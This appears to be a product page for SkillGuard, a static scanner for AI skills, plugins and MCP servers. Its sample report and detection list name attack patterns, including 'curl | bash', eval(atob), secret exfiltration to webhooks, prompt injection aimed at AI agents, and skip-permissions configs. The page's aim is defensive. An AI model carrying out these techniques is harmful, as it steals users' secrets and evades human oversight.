SkillGuard · by SameDayDesk
The skill/MCP ecosystem is exploding — and so is the attack surface. SkillGuard statically scans any skill, plugin, or MCP server for the patterns attackers actually use, in seconds. Free, no signup, and it never runs the code it's inspecting.
DANGER (4)
SKILL.md
■ Prompt-injection / data-exfil instruction in text [prompt-injection]
index.js
■ Env/secret exfiltration (sensitive env var + network) [env-exfil]
■ Hardcoded webhook / pastebin / raw-IP endpoint [exfil-host]
■ Obfuscated exec: eval(atob), curl | bash [obfuscation]
✗ DANGEROUS — do NOT install without reviewing the flagged files.
Also detects committed binaries, hardcoded private keys, the "commit an encrypted artifact" honeypot pattern, install-time postinstall hooks, and auto-approve-all / --dangerously-skip-permissions configs. Exit codes (0/2/3) let you gate CI on it. Source on GitHub →
The free CLI is the first line of defense. If you pull in third-party skills and MCP servers regularly, we'll do the deeper work for you:
SkillGuard does static analysis only. It clones with git clone (hooks disabled) and reads files — it never runs npm install, never executes build/postinstall scripts, and never runs the target code. Scanning a malicious package can't harm you. (A scanner that executed what it inspects would be the very risk it's meant to prevent.)
Heuristics catch known-bad patterns; a novel, determined attack can evade any static scanner. SkillGuard is a fast first line of defense, not a guarantee.